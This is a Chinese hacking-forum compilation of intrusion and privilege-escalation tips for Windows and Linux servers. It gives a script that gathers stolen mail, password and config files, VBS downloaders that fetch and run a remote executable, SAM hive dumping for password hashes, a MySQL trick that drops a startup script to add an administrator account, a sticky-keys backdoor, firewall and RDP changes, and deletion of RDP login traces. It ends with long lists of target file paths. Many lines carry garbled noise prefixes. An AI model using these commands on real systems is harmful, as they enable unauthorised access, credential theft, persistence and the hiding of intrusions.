. J4 p. ^8 ?" r8 k, }9 F% L, W感谢T00LS的童鞋们踊跃交流，让我学到许多经验，为了方便其他童鞋浏览，将T00LS的童鞋们补充的贴在下面，同时我也会以后将自己的一些想法跟新在后面。
$ [5 c# b7 j0 H- g. x4 u$ c+ }————————————————————————————
1、tar打包            tar -cvf /home/public_html/*.tar /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
alzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar
7 D" e" U1 n& O9 W" P: @{
注：
关于tar的打包方式,linux不以扩展名来决定文件类型。
若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压
那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
}  

提权先执行systeminfo
5 _9 O3 v5 a! rtoken 漏洞补丁号 KB956572
4 Y+ o/ |' r; u' O* ]) Y6 F9 P) ?Churrasco          kb952004
' @# B9 T5 k2 V8 i3 g$ g命令行RAR打包~~·
: E5 q5 G6 G! q- ^1 i% erar a -k -r -s -m3 c:\1.rar c:\folder
——————————————
1 A2 N# H9 H. ~+ _4 D2、收集系统信息的脚本  
" o% Y8 F% ~/ G& e  Ffor window：

- A9 u# q1 t3 V9 I$ e' ~. E@echo off
echo #########system info collection
. p/ h6 b. W7 A2 c- Y0 Isysteminfo
" t; h- P& a+ s+ V) J3 ^. M. d3 ^ver
hostname
3 d0 {. Q8 h. W& ]net user
net localgroup
0 y3 h6 J; ]+ b* H! A1 Dnet localgroup administrators
net user guest
net user administrator

0 u0 M- D/ ]/ }  d8 i! @7 Vecho #######at- with   atq#####
echo schtask /query

2 F' p. k1 r5 w& e  L/ n5 Kecho
3 [! r0 k, X; ?% F3 C% ~echo ####task-list#############
tasklist /svc
echo
) D6 X: j3 @: |; X1 Uecho ####net-work infomation
/ O- |" y8 M: v5 Z7 c2 aipconfig/all
route print
arp -a
netstat -anipconfig /displaydns
/ M3 D3 n% y: Decho
7 X" J" {' K8 q+ Wecho #######service############
9 c1 t; C1 x3 _3 U- y, v' csc query type= service state= all
* x1 C8 v$ K/ a) eecho #######file-##############
1 R. t& x7 X5 I/ L) x) Ecd \
& X( |/ \: Y- `0 n/ }; Htree -F
8 L1 v" E/ _& ?9 t* Q& N4 \. Y% cfor linux：
: u, n& R  T) E+ q! e5 Y  R
" n/ [9 o+ i* f- q. G6 s#!/bin/bash
$ p% i# O% p9 M! a
echo #######geting sysinfo####
; W* s1 S; @4 ]9 u2 cecho ######usage: ./getinfo.sh >/tmp/sysinfo.txt
: w7 U" p' e+ h+ Z$ y* z" yecho #######basic infomation##
- ]4 l  M, C' l: I& ]' Vcat /proc/meminfo
  `0 |/ T/ j& oecho
4 R- f. M. }8 }/ V! R1 F8 ^% Rcat /proc/cpuinfo
! N& N9 s0 M' b. techo
rpm -qa 2>/dev/null
' c0 {1 p, o0 o! T1 P/ u######stole the mail......######
cp -a /var/mail /tmp/getmail 2>/dev/null
! y$ o# _+ z& ~& i$ h7 [

echo 'u'r id is' `id`
! b* o6 Q/ ^/ z+ c6 [' Lecho ###atq&crontab#####
atq
crontab -l
, G& T. I7 d$ q1 U- \' V9 l6 D$ Wecho #####about var#####
set

echo #####about network###
$ u  C9 ~- Q5 P+ w; u. h####this is then point in pentest,but i am a new bird,so u need to add some in it
cat /etc/hosts
' C9 a, q/ z# {: ^, Yhostname
& P5 f8 X8 i. d8 K) F4 Iipconfig -a
+ w4 j- |- E2 Y8 m. x% barp -v
+ Z* S: O: l) M. R  b- gecho ########user####
cat /etc/passwd|grep -i sh

  f% w* R/ m! L' x: q+ b* @echo ######service####
chkconfig --list

for i in {oracle,mysql,tomcat,samba,apache,ftp}
9 H. N- @* k0 @9 U' c% e* v8 k% Dcat /etc/passwd|grep -i $i
3 m4 S! Z6 p9 A/ q$ [) Q7 Sdone

locate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
1 J: Z0 C' I9 u9 |0 o8 Ysleep 5
locate conf >/tmp/sysconfig 2>dev/null
9 G# B7 t  U0 ^3 Lsleep 5
: y! F& l- a2 h" B5 r2 ilocate config >>/tmp/sysconfig 2>/dev/null
sleep 5

###maybe can use "tree /"###
; l+ s( y6 M3 g  gecho ##packing up#########
! z& h% e7 q! c$ [3 e8 S" ytar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
——————————————
+ z, I- A# _/ ]* C3、ethash 不免杀怎么获取本机hash。
% F# ^5 {! \4 {1 o; Q首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"   （2000）
               reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg  （2003）
注意权限问题，一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问（界面登录的需要注意，system权限可以忽略）
接下来就简单了，把导出的注册表，down 到本机，修改注册表头导入本机，然后用抓去hash的工具抓本地用户就OK了
hash 抓完了记得把自己的账户密码改过来哦！
( f* ~) H" P/ g; D据我所知，某人是用这个方法虚拟机多次因为不知道密码而进不去！~
; }9 U: Z6 G4 J( o5 y3 c——————————————
% t2 [6 V! C! B4、vbs 下载者
1
  Q  G0 T3 U9 B0 p: Fecho Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
; r8 i! l/ l& g. g* `8 necho sGet.Type = 1 >>c:\windows\cftmon.vbs
8 p7 K9 ?. T& k0 s. D% Y5 hecho sGet.Open() >>c:\windows\cftmon.vbs
+ l; A6 D+ J6 K+ J6 d: D( M* f$ Decho sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
6 f. s. F3 P2 x4 \echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
6 H' b' N6 l9 N# |2 ncftmon.vbs

2
/ H6 y$ N* R6 o% ~8 COn Error Resume Nextim iRemote,iLocal,s1,s2
" u; c- J( N' Y( {iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))  
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
0 `1 y- ^: O3 b; l6 t7 eSet xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
; ]8 P9 T* e; [2 x; e' F* l9 xsGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2

cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe

当GetHashes获取不到hash时，可以用兵刃把sam复制到桌面
6 j% W4 Q0 \6 h$ n9 j——————————————————
! E' {7 ~; ^! S; g( S) ~$ R& u5、
9 |8 C( W. R4 Q/ M1.查询终端端口
$ i9 U) K' o  d9 u3 eREG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
6 r! \4 s2 k6 L8 B2.开启XP&2003终端服务
$ r: R' @7 I& H* a/ X9 N- p# O* bREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- U( ~: T, h" f# f- S- X2 r3.更改终端端口为2008(0x7d8)
4 b* R# n7 Z: l0 L& o- G' oREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
) A5 X. q- `8 c# mREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
8 f$ r9 q8 v2 m& \, t4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
6 B  F# ~% p& G; [% j6 ?( K6 C2 A1 sREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled   xpsp2res.dll,-22009 /f
————————————————
6、create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"")");
5 i& [# e2 E- {3 Vinsert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");  
( w4 S; f& c" c9 Iselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
) W; y# c/ L# `* ]: f————————————————————
; n! }# ]; E. J0 s7、BS马的PortMap功能，类似LCX做转发。若果支持ASPX，用这个转发会隐蔽点。（注：一直忽略了在偏僻角落的那个功能）
_____
8、for /d %i in (d:\freehost\*) do @echo %i

列出d的所有目录
  
9 D" i3 ~. u; A- }  for /d %i in (???) do @echo %i

把当前路径下文件夹的名字只有1-3个字母的打出来

% ^5 l: \8 v6 f5 r2.for /r %i in (*.exe) do @echo %i
  
以当前目录为搜索路径.会把目录与下面的子目录的全部EXE文件列出

for /r f:\freehost\hmadesign\web\ %i in (*.*) do @echo %i
) k6 c' m9 O; V& O" e4 c6 `
' _) z1 J+ J: t  g: A3.for /f %i in (c:\1.txt) do echo %i
7 w1 z2 h6 u, S# K* v& y) G! U1 y  
  //这个会显示a.txt里面的内容，因为/f的作用，会读出a.txt中
! j' E; W2 y! S: s5 p8 Z3 A
6 M* B  d, H" i* y/ u' L4.for /f "tokens=2 delims= " %i in (a.txt) do echo %i

: {' d& i+ J/ b. S. V% A1 {1 k  delims=后的空格是分隔符 tokens是取第几个位置
' Y1 B( u: d/ I; X: u——————————
●注册表:
2 I" u+ k9 ?" W1.Administrator注册表备份:
3 Y9 P' z7 P' rreg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg
% a% @1 S* Q, }& o
8 ]2 }* C* S% }, O' W9 k+ p2.修改3389的默认端口:
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
修改PortNumber.
3 D- R% h: p: ?. @
3.清除3389登录记录:
reg delete "HKCU\Software\Microsoft\Terminal Server Client"  /f
* P- R5 d3 ?' {& V7 D2 X! ^  h7 a
, W/ _% _' F0 S4.Radmin密码:
reg export HKLM\SYSTEM\RAdmin c:\a.reg
8 X3 }6 r- ^7 j- H4 Q# C% Q: O
5.禁用TCP/IP端口筛选(需重启):
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
/ }9 \+ t/ _+ g0 V+ A. F
! ?% {* }) d) O3 _: t! U* Z6 j6.IPSec默认免除项88端口(需重启):
% A& T) J8 r( b. w$ {* d: [reg add HKLM\SYSTEM\CurrentControlSet\Services\IPSEC /v NoDefaultExempt /t REG_DWORD /d 0 /f
或者
netsh ipsec dynamic set config ipsecexempt value=0

  F9 |+ F" Z5 x2 s/ ]6 F0 u7.停止指派策略"myipsec":
netsh ipsec static set policy name="myipsec" assign=n

8.系统口令恢复LM加密:
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LMCompatibilityLevel /t REG_DWORD /d 0 /f
' z+ i, m! J& f6 V- u$ z
9.另类方法抓系统密码HASH
reg save hklm\sam c:\sam.hive
0 y, k+ q& I# b3 Xreg save hklm\system c:\system.hive
. K. x7 y' L" W+ g  T! Ureg save hklm\security c:\security.hive

10.shift映像劫持
, Z0 n( c" n, s- V( O9 ~reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d cmd.exe
1 y7 A1 s, i; P% w
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
-----------------------------------
+ c7 l( v4 l- E! a  i1 g星外vbs(注：测试通过，好东西）
5 D9 q3 c1 @, j' l1 RSet ObjService=GetObject("IIS://LocalHost/W3SVC")
% q* ^& O# X  PFor Each obj3w In objservice
childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"")
$ l% T7 [2 u3 Q6 Z, [if IsNumeric(childObjectName)=true then
set IIs=objservice.GetObject("IIsWebServer",childObjectName)
if err.number<>0 then
exit for
msgbox("error!")
wscript.quit
end if
8 Z5 n* J3 r+ _+ {' @: U0 ~' Hserverbindings=IIS.serverBindings
ServerComment=iis.servercomment
* ~/ L# u, V" R# {" D6 uset IISweb=iis.getobject("IIsWebVirtualDir","Root")
5 {4 M; N+ X* o0 h0 U& {user=iisweb.AnonymousUserName
! B( t$ ]6 L& S2 t+ I# Ypass=iisweb.AnonymousUserPass
$ c) _% r  L( ]" e+ s# H, c; h- Vpath=IIsWeb.path
" d/ D1 U9 Z1 m( }) d% ^; z/ Ulist=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf
end if
Next
8 ~8 ]7 n; c* O9 V! Z" L! p, V: bwscript.echo list
Set ObjService=Nothing
wscript.echo "from : http://www.xxx.com/" &vbTab&vbCrLf
WScript.Quit
复制代码
' P4 m& [# t2 F8 j/ t5 G$ I----------------------2011新气象，欢迎各位补充、指正、优化。----------------
/ `& p* T, U7 n2 t( ], }1、Firefox的利用(主要用于内网渗透），火狐浏览器的密码储存在C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\文件夹，打包后，本地查看。或有很多惊喜~
& J+ S- `. a+ l% I! F2、win2k的htt提权（注：仅适合2k以及以下版本，文件夹不限,只读权限即可)
将folder.htt文件，加入以下代码：
) {+ ?7 _0 h4 ~0 q  b<OBJECT ID=RUNIT WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="cmd.exe">
</OBJECT>
! ~% M" [& I% f0 D: B4 Y& Y' \复制代码
然后与desktop.ini、cmd.exe同一个文件夹。当管理打开该文件夹时即可运行。
PS：我N年前在邪八讨论过XP下htt提权，由于N年前happy蠕虫的缘故，2K以后都没有folder.htt文件，但是xp下的htt自运行各位大牛给个力~
asp代码，利用的时候会出现登录问题
# c' P  @6 k8 N9 j4 x" y 原因是ASP大马里有这样的代码：（没有就没事儿了）
- v$ ~: _; G3 h& N# Q url=request.severvariables("url")
这里显示接收到的参数是通过URL来传递的，也就是说登录大马的时候服务器会解析b.asp，于是就出现了问题。
解决方法
url=request.severvariables("path_info")
path_info可以直接呈现虚拟路径 顺利解析gif大马

==============================================================
LINUX常见路径：

$ ^+ d* |; i0 B( m4 w/etc/passwd
7 a- b" b/ v0 k" Q4 y/etc/shadow
1 \2 s0 c1 u1 R/etc/fstab
! k8 Z5 c- C1 `3 u% L/etc/host.conf
/etc/motd
; u$ |& T6 B) q& }* [/etc/ld.so.conf
  [$ l0 y3 Y# u" g8 i$ I5 l/var/www/htdocs/index.php
* U' W, T5 t( m8 S/var/www/conf/httpd.conf
, J+ g) G9 [) p. e2 _/var/www/htdocs/index.html
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/httpd/conf/php.ini
/var/www/index.html
% W( a+ S) z3 N/var/www/index.php
: v' W  V8 [; x/ F! V+ i( ]! a/opt/www/conf/httpd.conf
( |: S. c0 X+ I  {  m' m( e/opt/www/htdocs/index.php
3 Q$ c+ C  n$ [% O: k: |+ M/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
. o! g2 o1 {2 O) _2 w% {- Z/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
6 g: D/ I2 h" N7 L, j/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
8 ]3 u& U9 D% s# M$ |+ _& q/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
5 h* v+ ], I6 ]" u( ~, l$ P/www/php/php.ini
/www/php4/php.ini
, f* {9 r4 F, A% x/www/php5/php.ini
/www/conf/httpd.conf
7 s# l' U+ V& ~4 o$ w: l2 s# X9 x/www/htdocs/index.php
  ]# F9 H3 R% `; `, @% G2 E8 M/www/htdocs/index.html
0 F8 e; T# [0 z8 [/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
4 L$ U2 U6 D  k3 F0 Z0 \7 v, u/etc/apache/apache.conf
& p+ o+ h7 |9 b' f+ q6 u3 R/etc/apache2/apache.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
3 |6 ]4 }- w. z7 n: N1 F/etc/apache2/vhosts.d/00_default_vhost.conf
) v* g! w7 O* \2 \! ?/etc/apache2/sites-available/default
) r: a- m* }- M& E" f/etc/phpmyadmin/config.inc.php
! h( a) L8 R+ k' T9 ?+ x/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
8 Q7 e- M9 y0 B% ~. n3 ~/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
8 \4 t8 C4 e9 ?6 e# `; W/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
. M4 }/ h4 f( s/ k/var/log/apache/error_log
/var/log/apache/error.log
6 S# c: O$ M5 x5 M/var/log/apache/access_log
/var/log/apache/access.log
+ f. A' W7 d' o. ]6 U/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
2 `& ?6 h* A! q/var/www/logs/error_log
) {. [! @8 \, u1 R5 b. E! s/var/www/logs/error.log
/var/www/logs/access_log
( }0 ^) {9 M- S+ r" P/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
" O; i$ G3 L. a, T" }) z/var/log/error.log
/var/log/access_log
( Y' w3 @) L7 K' j4 t/var/log/access.log
/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error_logerror_log.old
& |- {) g) T& |: g/etc/php.ini
0 H( w/ I! q& y* L. {2 t/bin/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
* Y# k! N. F; T( u8 P% J/etc/httpd/php.ini
) J4 _; T' {3 W1 f6 ^8 z7 F5 E8 k8 @. i  p/usr/lib/php.ini
/usr/lib/php/php.ini
; a" b# m8 e  L; S- ^/usr/local/etc/php.ini
2 G9 w9 {5 |8 u) E( T" x4 F/usr/local/lib/php.ini
/ c% g+ y) N8 h; N" q/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
$ W& E; N; K* g* T5 Q% ?# b( x/usr/local/php4/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
) b/ T" W9 {" c! @/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
& d4 b  [# a9 G$ e  X$ F: H/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/ S; T+ i4 O0 p8 |3 V8 E7 q, k  I/usr/local/apache2/conf/php.ini
# b8 @& e1 m( [$ U' R# X1 b# C/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
. b- }% i8 Q! Y" ]& a( x# d/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
( l, d1 W  m' w# k# L9 L" m/etc/php/php4/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
: E. b: i/ D: E" J5 v/web/conf/php.ini
" r3 H3 @8 n. E/usr/local/Zend/etc/php.ini
7 |, e- A3 d; v; p' j/opt/xampp/etc/php.ini
4 r8 h7 Z. K4 d/ w; V/var/local/www/conf/php.ini
/var/local/www/conf/httpd.conf
/etc/php/cgi/php.ini
/etc/php4/cgi/php.ini
3 {# h! O# j# L* f/etc/php5/cgi/php.ini
/php5/php.ini
  R6 T, ~: @9 y3 P7 j7 [0 w" }/php4/php.ini
/php/php.ini
/PHP/php.ini
2 l3 x+ @" n7 c; f( w% f2 M/apache/php/php.ini
8 z! Y+ u3 q2 @7 v$ o/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
1 t0 C3 _/ q& U/NetServer/bin/stable/apache/php.ini
3 C0 I7 U; k# t! {5 H/home2/bin/stable/apache/php.ini
/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
, v3 F' l2 G! D0 D3 y( O/var/log/mysql.log
% A! [4 d4 i# g0 M3 W" `/var/log/mysqlderror.log
6 ?+ ]. x! }$ {0 O& y; P/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
  f1 ]# N! Z/ W2 b8 q9 R+ S) T6 `6 E/var/mysql.log
/var/lib/mysql/my.cnf
+ Z, h5 }  ?  z4 L; e' k/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
( F9 F  k' |/ v/etc/mysql/my.cnf
3 o3 ?2 Y/ Y; r1 J$ P  a/etc/my.cnf
  ?& o* n. f$ P6 ?/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
$ S# m  X2 R4 _% N8 i/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
. H% q4 }- U3 r& f9 Y, N, ~# k/usr/local/cpanel/logs/stats_log
/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini
1 p/ I- y' S4 r; h3 e9 W' {
2..windows常见路径（可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘）

c:\windows\php.ini
c:\boot.ini
c:\1.txt
c:\a.txt
( a1 K+ g# R! R8 b6 O8 u# U
" f# y, J5 l0 Bc:\CMailServer\config.ini
) I9 C/ X% u+ D+ `8 m- W. a& V9 N5 {c:\CMailServer\CMailServer.exe
c:\CMailServer\WebMail\index.asp
: U% R. B# d& U4 Xc:\program files\CMailServer\CMailServer.exe
9 x( Z" O1 O" E+ `8 I# W5 K8 Lc:\program files\CMailServer\WebMail\index.asp
8 ]& _' M% z( V/ j3 iC:\WinWebMail\SysInfo.ini
. h+ L5 ]) ^+ i" E( H4 eC:\WinWebMail\Web\default.asp
: Z# p5 g% w6 nC:\WINDOWS\FreeHost32.dll
C:\WINDOWS\7i24iislog4.exe
C:\WINDOWS\7i24tool.exe

" u2 e) v$ c* q0 M  M6 w; ~c:\hzhost\databases\url.asp

" K0 I+ o: V8 }6 ]% Bc:\hzhost\hzclient.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk

C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
C:\WINDOWS\web.config
0 ]* F. U; o" a) u: Vc:\web\index.html
c:\www\index.html
c:\WWWROOT\index.html
' @( ^/ Z' S3 `: |0 |3 Jc:\website\index.html
: n6 e  z3 N2 L2 Nc:\web\index.asp
c:\www\index.asp
c:\wwwsite\index.asp
c:\WWWROOT\index.asp
c:\web\index.php
c:\www\index.php
% _+ ]$ w, G+ {- N. h. Z* fc:\WWWROOT\index.php
; S( E$ z9 u3 K% R6 d1 \8 _c:\WWWsite\index.php
9 H5 R+ `" ]) a! yc:\web\default.html
c:\www\default.html
8 {5 f8 T( R# X# Cc:\WWWROOT\default.html
c:\website\default.html
c:\web\default.asp
1 g* K/ M% Q& o% n% Fc:\www\default.asp
- F4 M" E3 L9 p2 ]3 ^c:\wwwsite\default.asp
c:\WWWROOT\default.asp
" \- d/ d! T% T$ Uc:\web\default.php
c:\www\default.php
c:\WWWROOT\default.php
c:\WWWsite\default.php
C:\Inetpub\wwwroot\pagerror.gif
, v( a7 o8 w& n- G9 `. Hc:\windows\notepad.exe
c:\winnt\notepad.exe
C:\Program Files\Microsoft Office\OFFICE10\winword.exe
C:\Program Files\Microsoft Office\OFFICE11\winword.exe
C:\Program Files\Microsoft Office\OFFICE12\winword.exe
8 o# O- R4 O0 r/ d" t4 HC:\Program Files\Internet Explorer\IEXPLORE.EXE
5 a: ], e3 P7 G7 d8 dC:\Program Files\winrar\rar.exe
C:\Program Files\360\360Safe\360safe.exe
C:\Program Files\360Safe\360safe.exe
5 O3 u  ?% H/ i2 iC:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
# Y- h3 A! B2 W9 v4 a5 _c:\ravbin\store.ini
( h5 s; S' r% _+ pc:\rising.ini
C:\Program Files\Rising\Rav\RsTask.xml
6 a9 c  w* I9 L/ ^+ R! y: }, YC:\Documents and Settings\All Users\Start Menu\desktop.ini
C:\Documents and Settings\Administrator\My Documents\Default.rdp
C:\Documents and Settings\Administrator\Cookies\index.dat
C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
! M$ p0 ]  T; d0 T( l' ^C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
C:\Documents and Settings\Administrator\My Documents\1.txt
C:\Documents and Settings\Administrator\桌面\1.txt
C:\Documents and Settings\Administrator\My Documents\a.txt
C:\Documents and Settings\Administrator\桌面\a.txt
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
" Z" w$ c* y* i& U2 G' n% r: {: jE:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
. E. E" [& d1 r" n6 e$ \C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Symantec\SYMEVENT.INF
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
. F8 s' s( n& x: c+ LC:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
$ ]9 R8 k' \" FC:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
6 c( O! ~3 M1 z* w0 _C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
" z9 K, w$ [  x$ x/ YC:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
C:\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
, X: |0 Z, a  [' S3 V4 jC:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
$ w( [: f% u" U6 CC:\Program Files\MySQL\MySQL Server 5.0\COPYING
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
2 u, g9 b! l% i+ G5 D1 t( AC:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\bin\mysql.exe
: k# a+ I9 t$ D/ p, Q( Z# ic:\MySQL\MySQL Server 4.1\data\mysql\user.frm
9 E* s! p4 M' F3 l+ eC:\Program Files\Oracle\oraconfig\Lpk.dll
" {) l/ F0 R7 T- n% ~! }2 u, mC:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
8 x8 X# }" l! h3 |1 c% o1 I6 qC:\WINDOWS\system32\inetsrv\w3wp.exe
/ _6 Y+ d+ T$ t5 _! yC:\WINDOWS\system32\inetsrv\inetinfo.exe
; o7 b* t3 T  y$ ]3 G' nC:\WINDOWS\system32\inetsrv\MetaBase.xml
C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
# o* O* ]' n) @& b. M5 xC:\WINDOWS\system32\config\default.LOG
# B0 m" X/ H7 c# B4 X. xC:\WINDOWS\system32\config\sam
& a7 u$ i5 U1 @/ rC:\WINDOWS\system32\config\system
c:\CMailServer\config.ini
$ F: G* l5 _6 D6 ~c:\program files\CMailServer\config.ini
c:\tomcat6\tomcat6\bin\version.sh
c:\tomcat6\bin\version.sh
c:\tomcat\bin\version.sh
  R, n, H; W$ _7 kc:\program files\tomcat6\bin\version.sh
. U. I- {9 T% U1 c  sC:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
- o! \; X! d  C6 W) z3 [: G* _+ [- ^c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
c:\Apache2\Apache2\bin\Apache.exe
c:\Apache2\bin\Apache.exe
# K3 v, l& M, Y0 c2 n/ s& {c:\Apache2\php\license.txt
C:\Program Files\Apache Group\Apache2\bin\Apache.exe
! _# h* X6 r5 ]/ ?: o3 h' X/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
c:\Program Files\QQ2007\qq.exe
# ?; ?( P, _& l7 _0 fc:\Program Files\Tencent\qq\User.db
% n5 d* w) S3 k  b" ?- Rc:\Program Files\Tencent\qq\qq.exe
c:\Program Files\Tencent\qq\bin\qq.exe
c:\Program Files\Tencent\qq2009\qq.exe
/ Q1 a- w& }( i8 F) M" R) nc:\Program Files\Tencent\qq2008\qq.exe
# N1 `  {7 y8 E, |' O, U5 ac:\Program Files\Tencent\qq2010\bin\qq.exe
; X! v9 `1 d8 C) U' l8 gc:\Program Files\Tencent\qq\Users\All Users\Registry.db
C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
! B9 j- a4 w3 E& K/ [7 Ic:\Program Files\Tencent\Tm\Bin\Txplatform.exe
c:\Program Files\Tencent\RTXServer\AppConfig.xml
